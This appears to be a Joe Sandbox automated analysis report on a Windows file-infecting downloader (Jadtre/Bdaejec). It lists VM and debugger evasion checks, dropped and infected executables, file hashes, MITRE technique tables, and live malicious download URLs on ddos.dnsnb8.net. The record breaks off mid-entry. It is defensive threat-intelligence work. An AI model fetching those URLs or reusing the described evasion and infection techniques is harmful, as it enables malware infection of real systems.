    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1074
    Source: C:\Users\user\Desktop\aRxo3E278B.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-7022
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 008F1754h1_2_008F1718
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_008F29E2
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_008F2B8C
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.1.drBinary or memory string: VMware
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeAPI call chain: ExitProcess graph end nodegraph_1-1049
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]0_2_00414044
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_0040CD6B
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_00409867
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00406000 SetUnhandledExceptionFilter,0_2_00406000
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004035C0
    Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: GetLocaleInfoA,0_2_0040A82A
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406507
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_008F139F
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: rbQTKRDg.exe PID: 5580, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: rbQTKRDg.exe PID: 5580, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts3
    Native API
    Boot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory131
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    aRxo3E278B.exe97%ReversingLabsWin32.Virus.Jadtre
    aRxo3E278B.exe89%VirustotalBrowse
    aRxo3E278B.exe100%AviraW32/Jadtre.B
    aRxo3E278B.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
    http://www.rftp.comJosiah0%Avira URL Cloudsafe
    http://www.activestate.com0%Avira URL Cloudsafe
    http://www.activestate.comHolger0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar)lZ100%Avira URL Cloudmalware
    http://www.rftp.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarp100%Avira URL Cloudmalware
    http://www.baanboard.comBrendon0%Avira URL Cloudsafe
    http://www.scintilla.org0%Avira URL Cloudsafe
    https://www.smartsharesystems.com/0%Avira URL Cloudsafe
    http://www.spaceblue.comMathias0%Avira URL Cloudsafe
    http://www.develop.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar9100%Avira URL Cloudmalware
    https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarel100%Avira URL Cloudmalware
    http://www.lua.org0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarV100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager100%Avira URL Cloudmalware
    http://www.spaceblue.com0%Avira URL Cloudsafe
    http://www.baanboard.com0%Avira URL Cloudsafe
    http://www.develop.comDeepak0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.rftp.comJosiahSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DErbQTKRDg.exe, 00000001.00000003.2098676346.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://upx.sf.netAmcache.hve.1.drfalse
        high
        http://www.rftp.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rar)lZrbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarrbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarprbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.baanboard.comBrendonSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.smartsharesystems.com/SciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.scintilla.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarelrbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rar9rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.develop.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.lua.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarVrbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.spaceblue.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerrbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.baanboard.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.develop.comDeepakSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        ddos.dnsnb8.netUnited States
        14618AMAZON-AESUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1581654
        Start date and time:2024-12-28 12:24:08 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 41s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:aRxo3E278B.exe
        renamed because original name is a hash value
        Original Sample Name:2024-12-28_93bc13a5ccf808ac29d512748221ce1d.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@5/11@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 19
        • Number of non-executed functions: 23
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.53.16, 13.107.246.63, 4.175.87.197
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        06:25:10API Interceptor1x Sleep call for process: WerFault.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/xoqfqirqhp
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • npukfztj.biz/edmrjb
        http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
        • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/eglmpsrvxnyx
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/peioi
        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
        • npukfztj.biz/cbecuogqej
        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
        • saytjshyf.biz/bkq
        invoice_96.73.exeGet hashmaliciousFormBookBrowse
        • jhvzpcfg.biz/tgcwttfqletfhyq
        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
        • hehckyov.biz/ircdert
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ddos.dnsnb8.netgT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
        • 44.221.84.105
        ib.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
        • 44.221.84.105
        BUG32.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZON-AESUSgT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
        • 34.226.108.155
        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
        • 3.218.7.103
        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\rbQTKRDg.exegT6IitwToH.exeGet hashmaliciousBdaejecBrowse
          #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
            #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
              #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                  ib.exeGet hashmaliciousBdaejecBrowse
                    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                      8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                        biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                          biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19456
                            Entropy (8bit):6.590916695737823
                            Encrypted:false
                            SSDEEP:384:1F9S9XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:QTQGPL4vzZq2o9W7GsxBbPr
                            MD5:834B753B6768A86A65DB3AB0755F147E
                            SHA1:3EA5B087F9DFE8F9E609D90039BD994D9F5CE633
                            SHA-256:0978B29CCB94AF3148BA5EE6C870D29EAE452C1E07497FD8963C16497B57C0D5
                            SHA-512:B38F8012F548E1E9911530540A57FBA8A19E9F8EA8B0BB714A15DE7D09836F92ECFFE2AE0E0F9AC778603921DF7F1B0DE83FC6F462060D6550164CEAEE7B7698
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):2389504
                            Entropy (8bit):6.731346290726403
                            Encrypted:false
                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                            MD5:A4C4417C239BCE0B08098A5C8F2B1048
                            SHA1:60BEF1D5429C13401DCA85FCC37B3D5411EC3A44
                            SHA-256:1145914DA014CF9E5B9B7C8CB6A95BF8294C9ACDAD010B8422B5C021300FC461
                            SHA-512:B42CBDA5F7B5B2B6711A2332C0758792C5243D807CAB52D7A0BC25157AD277D9B44FAE43C7BD72C0256BB9D46FCD67B4D8959BD1D0334914B2FBD610173E62D0
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):31744
                            Entropy (8bit):6.366281220760715
                            Encrypted:false
                            SSDEEP:768:uWQ3655Kv1X/qY1MSdTMQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdTPGCq2iW7z
                            MD5:173FE8D04C81E4695725A4990A86C397
                            SHA1:A4C179C54E27F1293B6A993C8E97E12D3E22CADC
                            SHA-256:46E7C802EEA77E3585BAEFC34B58E71065F14865E0BD27283ED161C5DE2F3B17
                            SHA-512:DED9786B808E3D25A847A3CEAB28D613F0383F0879BDA8D2DCFF99111BEC9150F756BEB86643FBDC3BDA58D7A8F8F34173F0C2B8CBF4A3D67C27648C485A150F
                            Malicious:true
                            Antivirus:
